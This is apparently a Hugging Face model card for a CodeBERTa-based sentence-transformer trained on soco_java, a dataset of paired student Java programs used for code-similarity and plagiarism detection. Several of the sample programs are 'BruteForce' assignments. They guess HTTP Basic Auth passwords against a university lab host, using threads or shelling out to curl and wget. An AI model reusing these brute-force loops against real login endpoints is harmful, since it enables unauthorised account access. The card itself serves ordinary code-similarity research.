SentenceTransformer based on huggingface/CodeBERTa-small-v1

This is a sentence-transformers model finetuned from huggingface/CodeBERTa-small-v1 on the soco_java dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.

Model Details

Model Description

  • Model Type: Sentence Transformer
  • Base model: huggingface/CodeBERTa-small-v1
  • Maximum Sequence Length: 512 tokens
  • Output Dimensionality: 768 dimensions
  • Similarity Function: Cosine Similarity
  • Training Dataset:

Model Sources

Full Model Architecture

SentenceTransformer(
  (0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel 
  (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)

Usage

Direct Usage (Sentence Transformers)

First install the Sentence Transformers library:

pip install -U sentence-transformers

Then you can load this model and run inference.

from sentence_transformers import SentenceTransformer

# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss")
# Run inference
sentences = [
    '\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\nclass BruteForce\n{\n\n public static void main (String a[])\n {\n \n final char [] alphabet = {\n        \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n        \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n        \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n        \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n        \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n        \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n        \'w\', \'x\', \'y\', \'z\'};\n\n String pwd="";\n \n for(int i=0;i<52;i++)\n {\n  for(int j=0;j<52;j++)\n  {\n   for(int k=0;k<52;k++)\n   {\n    pwd = alphabet[i]+""+alphabet[j]+""+alphabet[k];\n    String userPassword = ":"+pwd;\n    RealThread myTh = new RealThread(i,userPassword);\n    Thread th = new Thread( myTh );\n    th.start();\n    try\n    {\n     \n     \n     th.sleep(100);\n    }\n    catch(Exception e)\n    {} \n   }\n  }\n }\n\n\n}\n\n\n}\n\n\nclass RealThread implements Runnable\n{\n private int num;\n private URL url;\n private HttpURLConnection uc =null;\n private String userPassword;\n private int responseCode = 100;\n public RealThread (int i, String userPassword)\n {\n try\n {\n url = new URL("http://sec-crack.cs.rmit.edu./SEC/2/");\n }\n catch(Exception ex1)\n {\n }\n num = i;\n this.userPassword = userPassword;\n\n }\n \n public int getResponseCode()\n {\n\n return this.responseCode;\n }\n\n public void run()\n {\n  try\n  {\n  String encoding = new url.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n  uc = (HttpURLConnection)url.openConnection();\n  uc.setRequestProperty ("Authorization", " " + encoding);\n  System.out.println("Reponse  = "+uc.getResponseCode()+"for pwd = "+userPassword);\n  this.responseCode = uc.getResponseCode();\n  \n  if(uc.getResponseCode()==200)\n  {\n     System.out.println(" ======= Password Found : "+userPassword+" ========================================= ");\n     System.exit(0);\n  }\n\n  }\n  catch (Exception e) {\n  System.out.println("Could not execute Thread "+num+" ");\n  }\n }\n\n}\n',
    'import java.io.BufferedReader;\nimport java.io.FileInputStream;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.util.Date;\nimport java.util.Properties;\n\nimport javax.mail.Message;\nimport javax.mail.Session;\nimport javax.mail.Transport;\nimport javax.mail.Message.RecipientType;\nimport javax.mail.internet.InternetAddress;\nimport javax.mail.internet.MimeMessage;\n\n\n\n\npublic class Mailsend\n{\n    static final String SMTP_SERVER = MailsendPropertyHelper.getProperty("smtpServer");\n    static final String RECIPIENT_EMAIL = MailsendPropertyHelper.getProperty("recipient");\n    static final String SENDER_EMAIL = MailsendPropertyHelper.getProperty("sender");\n    static final String MESSAGE_HEADER = MailsendPropertyHelper.getProperty("messageHeader");\n\n\n\t\n\n\tpublic static void main(String args[])\n\t{\n\t\ttry\n\t\t{\n\t\t\t\n\t\t\tString smtpServer = SMTP_SERVER;\n\t\t\tString recip = RECIPIENT_EMAIL;\n\t\t\tString from = SENDER_EMAIL;\n\t\t\tString subject = MESSAGE_HEADER;\n\t\t\tString body = "Testing";\n\n\t\t\tSystem.out.println("Started sending the message");\n\t\t\tMailsend.send(smtpServer,recip , from, subject, body);\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tSystem.out.println(\n\t\t\t\t"Usage: java mailsend"\n\t\t\t\t\t+ " smtpServer toAddress fromAddress subjectText bodyText");\n\t\t}\n\n\t\tSystem.exit(0);\n\t}\n\n\n\t\n\tpublic static void send(String smtpServer, String receiver,\tString from, String subject, String body)\n\n\t{\n\t\ttry\n\t\t{\n\t\t\tProperties props = System.getProperties();\n\n\t\t\t\n\n\t\t\tprops.put("mail.smtp.host", smtpServer);\n\t\t\tprops.put("mail.smtp.timeout", "20000");\n\t\t\tprops.put("mail.smtp.connectiontimeout", "20000");\n\n\t\t\t\n\t\t\tSession session = Session.getDefaultInstance(props, null);\n\n\n\t\t\t\n\t\t\tMessage msg = new MimeMessage(session);\n\n\t\t\t\n\t\t\tmsg.setFrom(new InternetAddress(from));\n\t\t\tmsg.setRecipients(Message.RecipientType.NORMAL,\tInternetAddress.parse(receiver, false));\n\n\n\n\t\t\t\n\t\t\tmsg.setSubject(subject);\n\n\t\t\tmsg.setSentDate(new Date());\n\n\t\t\tmsg.setText(body);\n\n\t\t\t\n\t\t\tTransport.send(msg);\n\n\t\t\tSystem.out.println("sent the email with the differences : "+ + "using the mail server: "+ smtpServer);\n\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tex.printStackTrace();\n\t\t}\n\t}\n}\n',
    '\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\npublic class Watchdog extends TimerTask\n{\n\tpublic void run()\n\t{\n\t\tRuntime t = Runtime.getRuntime();\n\t  \tProcess pr= null;\n\t  \tString Fmd5,Smd5,temp1;\n\t  \tint index;\n          \n\t \ttry\n          \t{\n\t\t    \n\t\t    pr = t.exec("md5sum csfirst.html");\n\n                    InputStreamReader stre = new InputStreamReader(pr.getInputStream());\n                    BufferedReader bread = new BufferedReader(stre);\n\t\t    \n\t\t    s = bread.readLine();\n\t\t    index = s.indexOf(\' \');\n\t\t    Fmd5 = s.substring(0,index);\n\t\t    System.out.println(Fmd5);\n\t\t    \n\t\t    pr = null;\n\t\t    \n\t\t    pr = t.exec("wget http://www.cs.rmit.edu./students/");\n\t\t    pr = null;\n\t\t    \n\t\t    pr = t.exec("md5sum index.html");\n\t\t    \n\n\t\t    InputStreamReader stre1 = new InputStreamReader(pr.getInputStream());\n                    BufferedReader bread1 = new BufferedReader(stre1);\n\t\t    \n\t\t    temp1 = bread1.readLine();\n\t\t    index = temp1.indexOf(\' \');\n\t\t    Smd5 = temp1.substring(0,index);\n\t\t    System.out.println(Smd5);\n\t\t\n\t\t    pr = null;\n\t\t\n\t\t    if(Fmd5 == Smd5)\n\t\t       System.out.println("  changes Detected");\n\t\t    else\n\t\t    {\n\t\t       pr = t.exec("diff csfirst.html index.html > report.html");\n\t\t       pr = null;\n\t\t       \n\t\t       try{\n\t\t       Thread.sleep(10000);\n\t\t       }catch(Exception e){}\n\t\t       \n\t\t       pr = t.exec(" Message.txt | mutt -s Chnages  Webpage -a report.html -x @yallara.cs.rmit.edu.");\n\t\t     \n\t\t       \n\t\t       \n\t\t    }   \n\t\t    \n    \t        }catch(java.io.IOException e){}\n\t}\n}\t\t\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]

# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]

Training Details

Training Dataset

soco_java

  • Dataset: soco_java at c8fab14
  • Size: 30,069 training samples
  • Columns: label, text_1, and text_2
  • Approximate statistics based on the first 1000 samples:
    label text_1 text_2
    type int string string
    details
    • 0: ~99.70%
    • 1: ~0.30%
    • min: 51 tokens
    • mean: 450.65 tokens
    • max: 512 tokens
    • min: 51 tokens
    • mean: 468.5 tokens
    • max: 512 tokens
  • Samples:
    label text_1 text_2
    0




    import java.io.;
    import java.net.
    ;
    import java.Runtime;
    import java.util.*;
    import java.net.smtp.SmtpClient;



    public class WatchDog

    {

    static String strImageOutputFile01 = "WebPageImages01.txt";
    static String strImageOutputFile02 = "WebPageImages02.txt";

    static String strWebPageOutputFile01 = "WebPageOutput01.txt";
    static String strWebPageOutputFile02 = "WebPageOutput02.txt";

    static String strWatchDogDiffFile_01_02 = "WatchDogDiff_01_02.txt";

    static String strFromEmailDefault = "@.rmit.edu.";
    static String strToEmailDefault = "@.rmit.edu.";

    static String strFromEmail = null;
    static String strToEmail = null;




    public static void main (String args[])

    {







    URL url = null;
    HttpURLConnection urlConnection;
    int intContentLength;
    String strWebPageText = "";

    String strURL = "http://www.cs.rmit.edu./students/";
    String strPrePend = "...
    import java.io.;
    import java.net.
    ;
    import java.util.*;

    public class Watchdog
    {
    public static void main(String args[])
    {

    String mainLink="http://www.cs.rmit.edu./students/";
    String sender = "@cs.rmit.edu.";
    String recipient = "";
    String hostName = "yallara.cs.rmit.edu.";
    int delay = 86400000;

    try
    {
    int imgSrcIndex, imgSrcEnd;
    String imgLink;
    Vector imageList = new Vector();
    HttpURLConnection imgConnection;
    URL imgURL;


    EmailClient email = new EmailClient(sender, recipient, hostName);


    URL url=new URL(mainLink);
    HttpURLConnection connection = (HttpURLConnection) url.openConnection();

    BufferedReader webpage = new BufferedReader(new InputStreamReader(connection.getInputStream()));


    FileWriter fwrite = new FileWriter("local.txt");
    BufferedWriter writefile = new BufferedWriter(fwrite);

    String line=webpage.readLine();

    while (line != null)
    {

    writefile.write(line,0,line.length());
    wri...
    0 import java.util.;
    import java.io.
    ;
    import java.;

    public class Dogs5
    {
    public static void main(String [] args) throws Exception
    {
    executes("rm index.
    ");
    executes("wget http://www.cs.rmit.edu./students");

    while (true)
    {
    String addr= "wget http://www.cs.rmit.edu./students";
    executes(addr);
    String hash1 = md5sum("index.html");
    String hash2 = md5sum("index.html.1");
    System.out.println(hash1 +"
    "+ hash2);

    BufferedReader buf = new BufferedReader(new FileReader("/home/k//Assign2/ulist1.txt"));

    String line=" " ;
    String line1=" " ;
    String line2=" ";
    String line3=" ";
    String[] cad = new String[10];

    executes("./.sh");

    int i=0;
    while ((line = buf.readLine()) != null)
    {

    line1="http://www.cs.rmit.edu./students/images"+line;
    if (i==1)
    line2="http://www.cs.rmi...
    0

    import java.util.;
    import java.text.
    ;
    import java.io.;
    import java.
    ;
    import java.net.*;

    public class WatchDog
    {
    public static void main(String args[])
    {
    String s = null;
    String webpage = "http://www.cs.rmit.edu./students/";


    String file1 = "file1";
    String file2 = "file2";

    try
    {
    Process p = Runtime.getRuntime().exec("wget -O " + file1 + " " + webpage);

    BufferedReader stdInput = new BufferedReader(new
    InputStreamReader(p.getInputStream()));

    BufferedReader stdError = new BufferedReader(new
    InputStreamReader(p.getErrorStream()));


    while ((s = stdInput.readLine()) != null) {
    System.out.println(s);
    }


    while ((s = stdError.readLine()) != null) {
    System.out.println(s);
    }

    try
    {
    p.waitFor();
    }
    catch...


    import java.io.;
    import java.net.
    ;
    import java.util.;
    import java.String;
    import java.Object;
    import java.awt.
    ;



    public class WatchDog
    {
    private URL url;
    private URLConnection urlcon;
    private int lastModifiedSince = 0;
    private int lastModified[] = new int[2];

    private int count = 0;

    public static String oldFile;
    public static String newFile;

    private String diffFile;

    private BufferedWriter bw;
    private Process p;
    private Runtime r;
    private String fileName;



    private ArrayList old[]= new ArrayList[500];
    private ArrayList news[] = new ArrayList[500];
    private String info = "";
    private int index = 0;

    public WatchDog(String fileName)
    {
    this.fileName = fileName;
    oldFile = fileName + ".old";
    newFile = fileName + ".new";
    diffFile = "testFile.txt";
    }
    public static void main(String args[])
    {
    WatchDog wd = new WatchDog("TestDog");

    wd.detectChange(WatchDog.oldFile);
    while (true)
    {
    try
    {
    Thread.slee...
  • Loss: SoftmaxLoss

Evaluation Dataset

soco_java

  • Dataset: soco_java at c8fab14
  • Size: 3,342 evaluation samples
  • Columns: label, text_1, and text_2
  • Approximate statistics based on the first 1000 samples:
    label text_1 text_2
    type int string string
    details
    • 0: ~99.40%
    • 1: ~0.60%
    • min: 51 tokens
    • mean: 443.11 tokens
    • max: 512 tokens
    • min: 51 tokens
    • mean: 467.05 tokens
    • max: 512 tokens
  • Samples:
    label text_1 text_2
    0

    import java.Runtime;
    import java.io.*;

    public class differenceFile
    {
    StringWriter sw =null;
    PrintWriter pw = null;
    public differenceFile()
    {
    sw = new StringWriter();
    pw = new PrintWriter();
    }
    public String compareFile()
    {
    try
    {
    Process = Runtime.getRuntime().exec("diff History.txt Comparison.txt");

    InputStream write = sw.getInputStream();
    BufferedReader bf = new BufferedReader (new InputStreamReader(write));
    String line;
    while((line = bf.readLine())!=null)
    pw.println(line);
    if((sw.toString().trim()).equals(""))
    {
    System.out.println(" difference");
    return null;
    }
    System.out.println(sw.toString().trim());
    }catch(Exception e){}
    return sw.toString().trim();
    }
    }







    import java.;
    import java.io.
    ;
    import java.util.*;

    public class BruteForce
    {

    public static void main(String[] args)
    {
    Runtime rt = Runtime.getRuntime();
    Process pr= null;
    char chars[] = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};
    String pass;
    char temp[] = {'a','a'};
    char temp1[] = {'a','a','a'};
    char temp2[] = {'a'};

    String f= new String();
    String resp = new String();
    int count=0;
    String success = new String();
    InputStreamReader instre;
    BufferedReader bufread;


    for(int k=0;k<52;k++)
    {
    temp2[0]=chars[k];
    pass = new String(temp2);
    count++;

    System.out.println("The password tried ...
    0 import java.io.;
    import java.net.
    ;
    import java.util.*;

    public class Watchdog
    {
    public static void main(String args[])
    {

    String mainLink="http://www.cs.rmit.edu./students/";
    String sender = "@cs.rmit.edu.";
    String recipient = "";
    String hostName = "yallara.cs.rmit.edu.";
    int delay = 86400000;

    try
    {
    int imgSrcIndex, imgSrcEnd;
    String imgLink;
    Vector imageList = new Vector();
    HttpURLConnection imgConnection;
    URL imgURL;


    EmailClient email = new EmailClient(sender, recipient, hostName);


    URL url=new URL(mainLink);
    HttpURLConnection connection = (HttpURLConnection) url.openConnection();

    BufferedReader webpage = new BufferedReader(new InputStreamReader(connection.getInputStream()));


    FileWriter fwrite = new FileWriter("local.txt");
    BufferedWriter writefile = new BufferedWriter(fwrite);

    String line=webpage.readLine();

    while (line != null)
    {

    writefile.write(line,0,line.length());
    wri...


    import java.net.;
    import java.io.
    ;
    import java.String;
    import java.;
    import java.util.
    ;

    public class BruteForce {
    private static final int passwdLength = 3;
    private static String commandLine
    = "curl http://sec-crack.cs.rmit.edu./SEC/2/index.php -I -u :";
    private String chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    private int charLen = chars.length();
    private int n = 0;
    private int n3 = charLencharLencharLen;
    private String response;
    private String[] password = new String[charLencharLencharLen+charLen*charLen+charLen];
    private char[][] data = new char[passwdLength][charLen];
    private char[] pwdChar2 = new char[2];
    private char[] pwdChar = new char[passwdLength];
    private String url;
    private int startTime;
    private int endTime;
    private int totalTime;
    private float averageTime;
    private boolean finish;
    private Process curl;
    private BufferedReader bf, responseLine;

    ...
    0
    import java.io.;
    import java.awt.
    ;
    import java.net.*;

    public class BruteForce
    {
    public static void main (String[] args)
    {
    String pw = new String();
    pw = getPassword ();
    System.out.println("Password is: "+pw);
    }
    public static String getPassword()
    {
    String passWord = new String();
    passWord = "AAA";
    char[] guess = passWord.toCharArray();
    Process pro = null;
    Runtime runtime = Runtime.getRuntime();
    BufferedReader in = null;
    String str=null;
    boolean found = true;

    System.out.println(" attacking.....");
    for (int i=65;i<=122 ;i++ )
    {
    guess[0]=(char)(i);
    for (int j=65;j<=122 ;j++ )
    {
    guess[1]=(char)(j);
    for (int k=65 ;k<=122 ;k++ )
    {
    guess[2]=(char)(k);
    passWord = new String(guess);
    String cmd = "wget --http-user= --http-passwd="+passWord +" http://sec-crack.cs.rmit.edu./SEC/2/index.php ";
    try
    {
    pro = runtime.exec(cmd);

    in = new BufferedReader(new InputStreamReader(pro.getErrorSt...


    import java.io.;
    import java.text.
    ;
    import java.util.;
    import java.net.
    ;

    public class BruteForce extends Thread
    {
    private static final String USERNAME = "";
    private static final char [] POSSIBLE_CHAR =
    {'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
    'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
    'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
    'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'};
    private static int NUMBER_OF_THREAD = 500;

    private static Date startDate = null;
    private static Date endDate = null;

    private String address;
    private String password;

    public BruteForce(String address, String password)
    {
    this.address = address;
    this.password = password;
    }

    public static void main(String[] args) throws IOException
    {
    if (args.length < 1)
    {
    System.err.println("Invalid usage!");
    System.err.println("...
  • Loss: SoftmaxLoss

Training Hyperparameters

Non-Default Hyperparameters

  • eval_strategy: steps
  • per_device_train_batch_size: 16
  • per_device_eval_batch_size: 16
  • learning_rate: 2e-05
  • num_train_epochs: 1
  • warmup_ratio: 0.1
  • fp16: True

All Hyperparameters

Click to expand
  • overwrite_output_dir: False
  • do_predict: False
  • eval_strategy: steps
  • prediction_loss_only: True
  • per_device_train_batch_size: 16
  • per_device_eval_batch_size: 16
  • per_gpu_train_batch_size: None
  • per_gpu_eval_batch_size: None
  • gradient_accumulation_steps: 1
  • eval_accumulation_steps: None
  • torch_empty_cache_steps: None
  • learning_rate: 2e-05
  • weight_decay: 0.0
  • adam_beta1: 0.9
  • adam_beta2: 0.999
  • adam_epsilon: 1e-08
  • max_grad_norm: 1.0
  • num_train_epochs: 1
  • max_steps: -1
  • lr_scheduler_type: linear
  • lr_scheduler_kwargs: {}
  • warmup_ratio: 0.1
  • warmup_steps: 0
  • log_level: passive
  • log_level_replica: warning
  • log_on_each_node: True
  • logging_nan_inf_filter: True
  • save_safetensors: True
  • save_on_each_node: False
  • save_only_model: False
  • restore_callback_states_from_checkpoint: False
  • no_cuda: False
  • use_cpu: False
  • use_mps_device: False
  • seed: 42
  • data_seed: None
  • jit_mode_eval: False
  • use_ipex: False
  • bf16: False
  • fp16: True
  • fp16_opt_level: O1
  • half_precision_backend: auto
  • bf16_full_eval: False
  • fp16_full_eval: False
  • tf32: None
  • local_rank: 0
  • ddp_backend: None
  • tpu_num_cores: None
  • tpu_metrics_debug: False
  • debug: []
  • dataloader_drop_last: False
  • dataloader_num_workers: 0
  • dataloader_prefetch_factor: None
  • past_index: -1
  • disable_tqdm: False
  • remove_unused_columns: True
  • label_names: None
  • load_best_model_at_end: False
  • ignore_data_skip: False
  • fsdp: []
  • fsdp_min_num_params: 0
  • fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
  • fsdp_transformer_layer_cls_to_wrap: None
  • accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
  • deepspeed: None
  • label_smoothing_factor: 0.0
  • optim: adamw_torch
  • optim_args: None
  • adafactor: False
  • group_by_length: False
  • length_column_name: length
  • ddp_find_unused_parameters: None
  • ddp_bucket_cap_mb: None
  • ddp_broadcast_buffers: False
  • dataloader_pin_memory: True
  • dataloader_persistent_workers: False
  • skip_memory_metrics: True
  • use_legacy_prediction_loop: False
  • push_to_hub: False
  • resume_from_checkpoint: None
  • hub_model_id: None
  • hub_strategy: every_save
  • hub_private_repo: None
  • hub_always_push: False
  • gradient_checkpointing: False
  • gradient_checkpointing_kwargs: None
  • include_inputs_for_metrics: False
  • include_for_metrics: []
  • eval_do_concat_batches: True
  • fp16_backend: auto
  • push_to_hub_model_id: None
  • push_to_hub_organization: None
  • mp_parameters:
  • auto_find_batch_size: False
  • full_determinism: False
  • torchdynamo: None
  • ray_scope: last
  • ddp_timeout: 1800
  • torch_compile: False
  • torch_compile_backend: None
  • torch_compile_mode: None
  • include_tokens_per_second: False
  • include_num_input_tokens_seen: False
  • neftune_noise_alpha: None
  • optim_target_modules: None
  • batch_eval_metrics: False
  • eval_on_start: False
  • use_liger_kernel: False
  • eval_use_gather_object: False
  • average_tokens_across_devices: False
  • prompts: None
  • batch_sampler: batch_sampler
  • multi_dataset_batch_sampler: proportional

Training Logs

Epoch Step Training Loss Validation Loss
0.0532 100 0.2015 0.0240
0.1064 200 0.0143 0.0209
0.1596 300 0.0241 0.0241
0.2128 400 0.0174 0.0213
0.2660 500 0.0228 0.0206
0.3191 600 0.0061 0.0226
0.3723 700 0.0194 0.0208
0.4255 800 0.0193 0.0197
0.4787 900 0.0261 0.0175
0.5319 1000 0.0189 0.0178
0.5851 1100 0.0089 0.0188
0.6383 1200 0.0174 0.0161
0.6915 1300 0.0171 0.0162
0.7447 1400 0.0149 0.0155
0.7979 1500 0.011 0.0164
0.8511 1600 0.0308 0.0160
0.9043 1700 0.0048 0.0167
0.9574 1800 0.0142 0.0164

Framework Versions

  • Python: 3.11.13
  • Sentence Transformers: 4.1.0
  • Transformers: 4.52.4
  • PyTorch: 2.6.0+cu124
  • Accelerate: 1.7.0
  • Datasets: 3.6.0
  • Tokenizers: 0.21.1

Citation

BibTeX

Sentence Transformers and SoftmaxLoss

@inproceedings{reimers-2019-sentence-bert,
    title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
    author = "Reimers, Nils and Gurevych, Iryna",
    booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
    month = "11",
    year = "2019",
    publisher = "Association for Computational Linguistics",
    url = "https://arxiv.org/abs/1908.10084",
}
Downloads last month
9
Safetensors
Model size
83.5M params
Tensor type
F32
·
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support

Model tree for buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss

Finetuned
(34)
this model

Dataset used to train buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss